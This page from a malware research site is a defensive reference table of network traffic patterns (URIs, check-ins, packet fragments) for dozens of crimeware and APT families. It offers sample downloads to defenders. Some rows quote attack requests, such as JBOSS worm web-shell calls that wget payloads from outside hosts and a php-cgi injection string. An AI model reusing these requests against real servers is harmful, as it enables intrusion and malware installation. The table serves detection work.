Use the new link below for a new interface and updates.
Traffic analysis has long been the primary method of malware identification, and the thousands of IDS signatures developed over the years are daily proof of that. Signatures definitely help, but the ability to visually recognize malware traffic patterns has always been an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming, and it is difficult to keep track of malware features without access to a well-designed and constantly updated malware database. This started as a "personal notes" spreadsheet of GET and POST requests for different malware families, compiled from open sources. We decided others might find it useful too.
Click on the column headers to see recent entries. Use the other column headers to sort as needed. Wait a few seconds for the table to load from the Google Sheet. URI and User-Agent fields may contain extra spaces inserted for easier cell wrapping; remove them if you export the data.
Yes, you can download the samples mentioned in the spreadsheet. See the "dl" column in the full spreadsheet table and the corresponding links to the download location. Use the "Contagio" password scheme (email Mila or admin at deependresearch.org).
VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS"
List of malware families and the available downloads of their samples and pcaps (click on the link above for the full post).
type | family | method | uri |
CRIME | Carberb / /Glupteba | GET | /get_ads.php?yy=1&aid=2&atr=exts&src=199 /go/p1011105.subexts /go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1 /javascript/live_cd/popunder_script-1400195675.js /images/ffadult/css/header.css /css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css |
CRIME | Fiesta EK | GET | /?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G &QPy3i=J4HP58S7h&dRPS8=7bi7Y /?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c /?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR /?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5 /?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2 |
CRIME | Fiesta EK | GET | /yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9 /ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94 /ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54 |
CRIME | Gongdad / Gong Da compromised site redirects | GET | /pg/kcp/index.html /popup/index.html /my/by4.html |
CRIME | Gongdad / Gong Da EK | GET | /data/file/cr/index.html /data/file/cr/swfobject.js /data/file/cr/jquery-1.4.2.min.js /data/file/cr/main.html /data/file/cr/AyVpSf.jar /data/file/cr/com.class /data/file/cr/edu.class /data/file/cr/net.class /data/file/cr/org.class /windos.exe |
CRIME | Dalexis Loader | GET | /tmp/pack.tar.gz /assets/pack.tar.gz /piwigotest/pack.tar.gz /histoiredesarts/pack.tar.gz /fit/pack.tar.gz |
APT | Gholee / Rocket Kitten | GET / POST | /index.php?c=Ud7atknq&r=17117d /index.php?c=Ud7atknq&r=1710b2 |
CRIME | Zemot | GET | /b/shoe |
CRIME | Zemot DL via Asprox | GET | /catalog/159 |
CRIME | Zemot downloading Rovnix | GET | /mod_jshopping_products_gdle/mod_smartslider2/ |
CRIME | Zemot downloading Rerdom | GET | /mod_jshoppi/soft32.dl |
CRIME | Rerdom | GET | /b/eve/ |
CRIME | Clickfraud | GET | /b/req/ |
CRIME | Cidox / Rerdom / Clickfraud | GET | /b/eve/e91425775cc5d7e657bd2cc7 /b/letr/21D84379F768D95442B92BC5 /b/opt/E1805AD5D79824076249D696 /b/req/FDD953BA382388758DF27AE4 /b/pkg/ |
CRIME | Cidox / Rerdom / Clickfraud - clickurl GET | GET | /x/48petqwk9/ |
CRIME | Cidox / Rerdom / Clickfraud - clickurl GET | GET | /2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.com |
APT / CRIME | Scieron / Httneilc / HTClient | packet data 0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82 0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38 0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04 0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13 0040 00 12 00 63 01 00 | |
CRIME | Zollard RFI | POST | /cgi-bin/php? %2D%64+%... |
CRIME | Upatre | GET | /js/jquery-1.41.15.js /js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js /js/jquery-1.41.15.js?get_message=3290013886 |
CRIME | Cryptowall 3.0 | POST | http://proxy1-1-1.i2p/fee4roy2hih9 http://payto4gtpn5czl2.torforall.com/ofs20c |
CRIME | Andromeda | POST | /ldr.php |
CRIME | Angler EK Chain | GET | /t19jl0hvv2.php |
CRIME | Angler EK Chain | GET | /752s2n0ndw.php |
CRIME | Angler EK Chain | GET | /erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp |
CRIME | Angler EK Chain | GET | /P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN |
CRIME | Angler EK Chain | GET | /models/runway/ring/header.js |
CRIME | Angler EK Chain | GET | /code/decrease/revenue/core.js |
CRIME | Asprox / Kuluoz | GET | /include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak= HTTPS over port 443 as a possible connectivity check |
CRIME | Asprox / Kuluoz | POST | /index.php |
CRIME | Chanitor | POST | /gate.php |
CRIME | Chanitor Downloads | GET | /wp-includes/js/tinymce/plugins/wpfullscreen/1.php /wp-includes/js/tinymce/skins/lightgray/1.php /wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php /wp-includes/js/tinymce/plugins/wpfullscreen/1.php |
CRIME | Cryptowall | POST | /532boskc3i0 /nvebi4m4ggdokz /wbkljtzpimbryt |
CRIME | Cryptowall | GET | /wp-content/themes/exiportal/dh5x3a1815j /wp-content/themes/esther/6l7de |
CRIME | Dridex payload | GET | /mopsi/popsi.php /js/bin.exe |
CRIME | Fake AV post compromise | GET | /?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn |
CRIME | Fiesta EK | GET | /txf9p_v8/ye1PlchZ7X9pFcl0o-y3 /txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287 /txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406 |
CRIME | Flashpack EK | GET | /sv62a76d18537/index.php |
CRIME | GameThief | POST | /tj.asp |
CRIME | GameThief | GET | /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack |
CRIME | Gypothy | GET | /bigbight/kinkong.txt |
CRIME | H-W0rm | POST | /SpCoderHere |
CRIME | KaiXin EK | GET | /indexindex/ /indexindex/gg.jpg /indexindex/jquery-1.4.2.min.js /indexindex/swfobject.js /indexindex/main.html /xzz1.exe /indexindex/NlNwQh.jar /indexindex/com.class /indexindex/edu.class /indexindex/net.class /indexindex/org.class |
CRIME | Kovter | POST | /9/form.php /11/form.php /w1/form.php /1/feed.php |
CRIME | Nuclear EK | GET / POST | /XhBWV0gBT08OVFVW.html /AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA /ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j |
CRIME | Poweliks | GET | /query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 /query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 /query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 /query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 |
CRIME | Redirect to Fiesta EK | GET | /?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO & m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3 |
CRIME | Sweet Orange EK | GET | /admin4_account/mobile/movies.php?timeline=18 /bad/generic/help.php?state=39 /cnet/tmp/Indy_admin/investor.php?setup=20 /dbadmin/wp-admin/hex/help.php?state=33 /forums/example/screens/investor.php?setup=20 /gcc/tmp/bad/help.php?state=25 /ip/ch/investor.php?setup=20 /profiles/stat/movies.php?timeline=21 |
CRIME | Sweet Orange EK | GET | /printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064 /printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair /printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix /store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249 /teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535 /teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil /teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954 /serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315 |
CRIME | TBD | POST | /store/ |
CRIME | TBD Post Flashpack | GET | /r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ /search?q=wrestling&subid=4699 /click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ |
CRIME | TBD Proxy (Htbot?) | GET | /ocfg.php?command=getip /ocfg.php?command=getid /ocfg.php?command=ghl&id=1493496 /ocfg.php?command=dl&id=1493496 /ocfg.php?command=version&id=1493496 /ocfg.php?command=getbackconnect /pointer.php?proxy= |
CRIME | Upatre | GET | /1501us22/ /1501us22/ /2807cw/ /2807cw/ /2807cw/ /1201uk1/ /1201uk1/ /1201uk1/ /2307stat/ /2307stat/ /2307stat/ |
CRIME | Vavtrak / Neverquest | POST | /collection/0000004E/00/9EBD6132 |
CRIME | Zeus | GET | /backup/config.bin /en/images/config.bin /guardnow/config.bin /guardnow/config.bin |
CRIME | Zeus | POST | /choosen/helps/file.php |
CRIME | AdWare Kraddare.IL | GET | /bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... |
CRIME | AdWare Kraddare.IL | POST | /bv/config.php |
CRIME | Dyre | GET | /2001uk11/HOME/1/0/0/ |
CRIME | Dyre | GET | /mandoc/eula012.pdf |
CRIME | Dyre | GET | /mandoc/ml1from1.tar |
CRIME | Dyre plugin dl | GET | /ineede900.rar |
CRIME | Kazy | GET | /cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR |
CRIME | Mudrop | GET | /gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c= |
CRIME | ChePro (Brazil.banker) | GET | /ini/xvwmmwb.mod |
CRIME | Cryptolocker | POST | /home/ |
CRIME | Reedum | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] | |
APT | Vidgrab | POST | (172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|. |
APT | Page / stscout / Elise / lStudio / Wumins | GET | /29af9cdc/page_12082223.html |
CRIME | Tijcont | GET | /s/blog_b2afd7fe01019tkf.htm |
APT | Darkcomet | GET | /a.php?id=c2ViYWxpQGxpYmVyby5pdA== |
CRIME | Kelihos | GET | /index.htm |
CRIME | Kuluoz Run command from C2 | n | c=run&u=/get/7d2c37d2070e1b38 6070db8c851dae08.exe&crc= 9e2b9c4f465 b765fc971423935c4b68e |
APT | njRAT / Backdoor.LV | lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'| Examiner|'|'|2013-06-21|'|'|USA|'|'| Win XP ProfessionalSP2 ... 171.ll|'|'|Li4uLi4uLk5FVy4uLi4u Li4uX0F FNTJDMzdE|'|'|SENTA|'|'| sentai55|'|'|15-01-29|'|'||'|'| Win 8.1SP0 x64|'|'|Yes|'|'|0.7d| '|'|..|'|'||'|'|b88ece4c04f706 c9717bbe6fb da49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uL i4uLi4uDQpyZWVlZWVk LmR5bmRucy5iaXo6M jUyNTQNCkFwcERhdGENCldpbnJhci5leG UNClRydWUNCkZhbHNlDQpU cnVlDQpGYWxzZQ==0. 251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJD MzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd 2VsbCB2LiBIb2JieSBMb2JieSBBYnJpZGdlZCBbQ29tcGF0aWJpbGl0eSBNb 2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2, lv|'|'|VHJvamFuX0M0NkY2RTk= |'|'|MARK|'|'|user |'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof] | |
CRIME | Chimerka.1 / Refyes.A | POST | /sys.php |
CRIME | Sality | GET | /images/logos.gif?1f5428=8212640 |
CRIME | Nitedrem | GET | /down.asp?action=install&u=cpmcpm&p= 2366A64BAA384EA6AB9CEF73E8E2BE12&t =7393 |
CRIME | Nitedrem | GET | /upx/kod.txt?k=123&t=7215 |
CRIME | Nitedrem | GET | ...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:............... |
CRIME | Nitedrem | GET | /config.txt?&t=4593 |
CRIME | Nitedrem | GET | /fish.jpg?&t=4426 |
CRIME | Sality | GET | /?12da89=12355930 |
CRIME | Sality | GET | /images/logos.gif?114bbc=9068000 |
CRIME | Sality | GET | /setting.doc |
CRIME | Torpig /Sinowal miniloader | GET | / |
CRIME | Torpig /Sinowal miniloader | GET | /search2?fr=altavista&itag=ody&q= b88d6ce7e9fe419788716298cc747adc %2C93a5d8146fea0bbb&kgs=1&kls=0 |
CRIME | EK Popads | GET | /?7d456d68729292e9843cb9dde2d2f7b4=34 |
CRIME | EK Popads | GET | /4d23ccceb2cf9e6c1c91df06170259d3/32cd ad27bdec4a68d8efc9bb835008e6.swf |
CRIME | EK Popads | GET | /855feed4acbb99c63ad7f25fef289284/decaff5b6ee 641742f53d8ef8c6f9a16.jar |
CRIME | EK Popads | GET | /?c480cfaa684e1dc0db1b2e1f891d814a= a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in |
CRIME | EK Popads | GET | /39ff9ff8c3b603d8eed017df64dd2799.eot |
CRIME | Alina POS v5.6 | POST | /duck/push.php |
CRIME | Alina POS v5.6 | POST | /adobe/version_check.php |
CRIME | Alina POS v6.0 | POST | /adobe/version_check.php |
APT (IN) | Hanove / Tourist | POST | /kamp.php |
APT | Surtr 2nd Stage DL | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ | |
APT | Surtr 2nd Stage DL | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ | |
APT | Surtr Initial GET | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ | |
APT | Taleret | GET | / |
APT | Taleret | GET | /jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU- |
CRIME | Sweet Orange EK | GET | /in.php?q=WPOChVXlw9QiOTwtCbg+ uSk36elyOCiUwI99U0PYxA== |
CRIME | ArcomRat / Dokstormac | POST | S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^] username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption [!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^] |
CRIME | Ardamax keylogger | SMTP | 220 smtp.mail.yahoo.com ESMTP ready EHLO DELLXT 250-smtp.mail.yahoo.com |
CRIME | Matsnu - MBR wiping ransomware | POST | /f44/myse.php |
CRIME | Mutopy Downloader | GET | /d/conh11.jpg |
CRIME | Mutopy Downloader initial callback | GET | /protocol.php?p=3894120584&d=4fQm27CpL9m6oC7 QvLZomrXyeYvptmyetaVE2deiLdi4 |
CRIME | Symmi Remote File Injector | GET | /img/seek.cgi?lin=100&db=dfs /ae1.php /ggu.php /wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies] |
CRIME | Matsnu - MBR wiping ransomware | GET | /inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458 &stat=0&ver=2000803&loc=0x0409&os=Windows%20XP |
CRIME | Adware Hotbar | POST | /vic.aspx?ver=4.0.1158.0&rnd=595937 |
CRIME | Blackhole v2 | GET | /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2 w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a= 1f&zg=c&tn=g&jopa=1658622 |
CRIME | USteal.D | 220---------- Welcome to Pure-FTPd ---------- | |
APT | Hangover Smackdown Minapro | GET | /flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts= [PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2 |
CRIME | Cutwail / Pushdo | POST | /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe |
APT | Mediana Proxy | GET | /index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0 |
CRIME | Zeus | POST | /orders2010.php /busted.php |
CRIME | Gypthoy | POST | /opt/mainpage.php |
APT | Hupigon / Graybird | ........................................;... Windows XP 5.1 (2600.Service Pack 3).......................... ......................................$...DELLXT.................................... .................................... ........................................... 4s.love.......HACK.. | |
APT | Variant Letsgo / TabMsgSQL downloader (comment crew) | GET | /index.htm |
APT | Tapaoux | GET | /ol/yahoo/banner4.php?jpg=../yahoo |
CRIME | Horst Proxy | GET | /socks/proxy.php?ip=172.16.253.129&port= 41080&os=XP&iso=USA&smtp=0 |
CRIME | PassAlert | GET | /loader/bin/file1.exe |
CRIME | Bitcoinminer | POST | / |
CRIME | Karagany Loader | GET | /user/go.php?html=do |
APT | Gh0st | Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1 | |
APT | IXESHE | GET | /AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9j OKyjnxKjQJA x_bigfix_client_string: baQMyZrdqDAA |
APT2 | KoreanBanker DL | GET | /web/down/kbs.exe |
APT | Plugx | SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO4 6Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png | |
CRIME | PowerLoader | POST | /postnuke/blog.php |
APT | RssFeeder (moved from TBD tab, common name still unknown) 2nd stage | POST | /orange/news.php |
APT | RssFeeder (moved from TBD tab, common name still unknown) initial GET | POST | /data/rss |
APT | Swami | GET | /im/linux.php |
CRIME | GameThief | GET | /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4 D468A2&os=winxp%20 Professional&avs=unknow&ps=NO.&ver=0005&pnum=16 |
CRIME | Beebone downloader | GET | /0/?f|-1813912965Admin /a/76876332/1 |
CRIME | Neutrino EK var | POST | /cxiqocvbqd |
APT | Comfoo / Vinself / Mspub | POST | /BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/ 12AzAONjkCYw/UD1aND43a0xiWQ161/ |
APT | Destory Rat / Sogu / Thoper | POST | /update?id=000f72b8 |
APT2 | Disttrack / Shamoon | GET | /ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203 |
CRIME | Avatar Rootkit | GET | /search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance |
APT | 9002 | POST | 9002..................wx....9002..................wx....9002....................... |
APT | MSWab /Yayih | POST | /bbs/info.asp |
CRIME | ZeroAccess / Sirefef | GET | /stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25 /count.php?page=952000&style=LED_g&nbdigits=9 |
CRIME | ZeroAccess / Sirefef ppc fraud - redirect | GET | HTTP/1.1 302 Moved Temporarily |
APT | 9002 | POST | /2d |
CRIME | Asprox / Kuluoz gets list of C2s | GET | /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 |
CRIME | Asprox / Kuluoz Checkin | GET | /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF |
CRIME | Asprox / Kuluoz GETs spam template | GET | /78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82 |
CRIME | Carberb | POST | /kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm |
CRIME | FakeAV var (via Kuluoz - Asprox botnet) | GET | /AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F |
APT | Favorites | GET | /download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE |
APT | Favorites | GET | /search?qu= |
APT | Favorites | GET | /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE |
APT | Favorites | GET | /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE |
APT | Favorites | POST | /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH |
APT | Favorites | POST | /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE |
APT | Gh0st | GET | /cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel] |
APT | Gh0st var | GET | /h.gif?pid =113&v=130586214568 HTTP/ 1. 1 |
CRIME | Guntior - CN bootkit | GET | /yx/tongji.html |
CRIME | Kuluoz.B downloader | GET | /index.php?r=gate&fq=acc0e9de&group=sl15&debug=0 |
CRIME | Ranbyus / Triton (Spy, Banking, smart cards) | POST | /releases/index.php |
CRIME | Urausy (Ransomware) | GET | /ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php |
APT | Glasses | GET | /ewpindex.htm |
APT | IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT | POST | /index000000001.asp |
APT | LURK | GET | LURK0........x.kf.e.apgpbpa0c..#........ |
APT | DNSWatch / Protux | GET | /dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve |
APT | DNSWatch / Protux | GET | /news.jpg |
APT | DNSWatch / Protux | POST | /PHqgHumeay5705.mp3 |
CRIME | Andromeda | POST | /new/gate.php |
CRIME | Citadel | POST | /g.php |
CRIME | Citadel (Zbot var) | POST | /C270suqdh/file.php |
CRIME | Pony loader | POST | /ponyb/gate.php HTTP/1.0 |
CRIME | Reedum | GET | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] |
APT | APT1 WEBC2_RAVE | GET | /comp/sem/resources.htm |
APT | backdoor ? | GET | /18110123/page_32262 308.html |
APT | Banechant 1 | GET | /IGKKT |
APT | Banechant payload dl 2 | GET | /adserv/logo.jpg HTTP /1.1 |
APT | Beebus | GET | /windosdate/v6/default.aspx?ln=en-us |
APT | Beebus C2 checkin | GET | /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 |
APT | Beebus C2 checkin | GET | /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 |
APT | Beebus data send | POST | /s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2 |
CRIME EK | Blackhole 2 | GET | /fded177fe12651bb038f3f11b01c4168/q.php |
APT | Cookies /Cookiebag / Dalbot | GET | /1799.asp |
APT | Cookies /Cookiebag / Dalbot | GET | /3961.html Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs= |
APT | Cookies /Cookiebag / Dalbot | GET | /8223.asp (can also be /2007.asp, /2013.asp etc.) |
APT | Cookies /Cookiebag / Dalbot | GET | /indexs.zip |
APT | Coswid | GET | /old/google.png |
APT | CVE-2012-0754 SWF in DOC | GET | /test.mp4 |
APT | CVE-2012-0779 | GET | /essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000 |
CRIME | Darkmegi | GET | /20111230.jpg |
CRIME | Darkness DDos v8g | GET | /index.php?uid=587609&ver=8g%20XP |
APT | Depyot | GET | /new/3d/d/pdf.php?id=2 |
APT | Destory Rat / Sogu / Thoper | POST | /update?id=000f6b50 |
APT | Destory Rat / Sogu / Thoper | POST | /update?id=3109c2a2 |
APT | Destory Rat / Sogu / Thoper | POST | /update?product=windows |
CRIME | DirtJumper DDoS | POST | /678/index.php |
CRIME | Dirtjumper ddos | POST | /boi854tr4w.php |
CRIME | DNSChanger | POST | /d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWTI0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg== |
APT | Downloader BMP | GET | /images/evil.bmp |
APT | Einstein | GET | /gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs |
APT | Einstein data send | POST | /gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK |
CRIME EK | EK - Blackhole 2 landing | GET | /news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd |
CRIME EK | EK Blackhole 1 | GET | /showthread.php?t=d7ad916d1c0396ff |
CRIME EK | EK Phoenix | GET | /navigator/jueoaritjuir.php |
APT | Enfal / Lurid | GET | /oi2c/wlc3/ [redacted]:00-00-00-00-00-00/ij83d |
APT | Enfal / Lurid | GET | /trandocs/nm/.[redacted] :00-00-00-00-00-00lCrrrwhite |
APT | Enfal / Lurid | POST | /cgi-bin/CMS_SubitAll.cgi |
APT | Enfal / Lurid | POST | /cgl-bin/Owpq4.cgi |
APT | Enfal / Lurid | POST | /Sjwpc/odw3ux |
CRIME | Flashback OSX | GET | /statistics.html |
APT | Foxy | POST | /404error.asp |
APT | Foxy Checkin | GET | /images/leftnav_prog_bg.jpg |
APT | Gh0st ASP ver | GET | /1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr....)IL{..&y192.168.0.69 |
APT | Gh0st PHP ver | GET | /ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l |
APT | Gh0st v2000 var | n | v2010........f...............( ......Service Pack 2..?..|...|...|0.@.. |
APT | GoogleAdC2 | GET | /html/lost.html |
APT | GoogleAdC2 2nd stage | GET | /Trojan2.jpg |
APT | Googles | GET | /sll/monica.jpg |
APT | Greencat | GET | / |
APT | Gtalk | GET | /facebook.png |
Hacktivism | HOIC DDoS | GET | / HTTP/1.0 |
CRIME | Imaut | GET | /setting.doc |
CRIME | IRCbot | GET | /check_ver.php?version=1.09 |
APT | IXESHE | GET | /AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/ wTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A |
APT | IXESHE AES | GET | /AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk= +LLQhpkZ9LOhGbgqvJghHci7M |
CRIME | JBOSS worm | GET | /zecmd/zecmd.jsp?comment=perl+lindb.pl |
CRIME | JBOSS worm | GET | /idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz |
CRIME | JBOSS worm | GET | /iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz |
